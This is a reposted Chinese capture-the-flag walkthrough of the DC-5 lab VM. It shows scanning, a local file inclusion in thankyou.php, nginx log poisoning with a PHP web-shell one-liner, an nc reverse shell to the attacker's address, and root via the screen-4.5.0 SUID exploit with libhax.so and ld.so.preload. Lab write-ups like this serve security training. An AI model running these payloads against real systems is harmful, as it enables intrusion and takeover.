大佬教程收集整理的这篇文章主要介绍了DC-5,大佬教程大佬觉得挺不错的,现在分享给大家,也给大家做个参考。
DC-5
nmap -T4 -A -p 1-65535 192.168.211.137
80和111,扫下目录
dirb http://192.168.211.137/
@H_675_21@
再看下网页,功能也挺简单
作者说了随着页面刷新而改变的东西,感觉漏洞点可能在提交表单后的/thankyou.php
尝试了一下,发现刷新页面,Copyright的年份会跟着变
面向百度渗透,可能存在LFI,那尝试一下
?file=php://filter/read=convert.base64-encode/resource=index.php
确实存在此漏洞,读一下thankyou.php的源代码
<?php
$file = $_GET['file'];
if(isset($filE))
{
include("$file");
}
else
{
include("footer.php");
}
?>
就是很简单一个文件包含include 函数,再读一下/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
BACkup:x:34:34:BACkup:/var/BACkups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-ReporTing System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
Debian-exim:x:104:109::/var/spool/exim4:/bin/false
messagebus:x:105:110::/var/run/dbus:/bin/false
statd:x:106:65534::/var/lib/nfs:/bin/false
sshd:x:107:65534::/var/run/sshd:/usr/sbin/nologin
dc:x:1000:1000:dc,,,:/home/dc:/bin/bash
mysql:x:108:113:MySQL Server,,,:/nonexistent:/bin/false
尝试php://input写入一句话木马,失败了,可能是权限或者设置的问题,读一下nginx配置文件看一看
user www-data;
worker_processes 4;
pid /run/nginx.pid;
events {
worker_connections 768;
# multi_accept on;
}
http {
##
# Basic SetTings
##
sendfile on;
tcp_nopush on;
tcp_nodelay on;
keepalive_timeout 65;
types_hash_max_size 2048;
# server_tokens off;
# server_names_hash_bucket_size 64;
# server_name_in_redirect off;
include /etc/nginx/mime.types;
default_type application/octet-stream;
##
# SSL SetTings
##
ssl_protocols TLSv1 TLSv1.1 TLSv1.2; # Dropping SSLv3, ref: POODLE
ssl_prefer_server_ciphers on;
##
# Logging SetTings
##
access_log /var/log/nginx/access.log;
error_log /var/log/nginx/error.log;
##
# Gzip SetTings
##
gzip on;
gzip_disable "msie6";
# gzip_vary on;
# gzip_proxied any;
# gzip_comp_level 6;
# gzip_buffers 16 8k;
# gzip_http_version 1.1;
# gzip_types text/plain text/css application/json application/javascript text/xml application/xml application/xml+rss text/javascript;
##
# Virtual Host Configs
##
include /etc/nginx/conf.d/*.conf;
include /etc/nginx/sites-enabled/*;
}
#mail {
# # See sample authentication script at:
# # http://wiki.nginx.org/ImapAuthenticateWithApachephpScript
#
# # auth_http localhost/auth.php;
# # pop3_capabilities "TOP" "USER";
# # imap_capabilities "IMAP4rev1" "UIDPLUS";
#
# server {
# listen localhost:110;
# protocol pop3;
# proxy on;
# }
#
# server {
# listen localhost:143;
# protocol imap;
# proxy on;
# }
#}
日志存放在
/var/log/nginx/access.log
那思考,直接访问带一句话木马的url,让其在日志中,通过日志配合文件包含getsHell
?file=/var/log/nginx/access.log
访问<?php system($_GET['cmd']); ?>,让日志中存在这句代码
文件包含执行system函数,反弹sHell
/thankyou.php?file=/var/log/nginx/access.log&cmd=nc -e /bin/bash 192.168.211.131 6666
成功反弹sHell
内核提权看来不太可能,尝试一下SUID提权
find / -perm -u=s -type f 2>/dev/null
发现有screen-4.5.0
searchsploit screen
41154文件无法直接运行,需要分成三个部分
libhax.c
编译:gcc -fPIC -shared -ldl -o libhax.so libhax.c
编译:gcc -o rootsHell rootsHell.c
搭建一个http server
python -m SimplehttpServer 1337
将这两个文件传入靶机/tmp目录中
依次输入
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne "x0a/tmp/libhax.so" # newline needed
echo "[+] triggering..."
screen -ls
/tmp/rootsHell
成功提权
获取flag
以上是大佬教程为你收集整理的DC-5全部内容,希望文章能够帮你解决DC-5所遇到的程序开发问题。
如果觉得大佬教程网站内容还不错,欢迎将大佬教程推荐给程序员好友。
本图文内容来源于网友网络收集整理提供,作为学习参考使用,版权属于原作者。
如您有任何意见或建议可联系处理。小编QQ:384754419,请注明来意。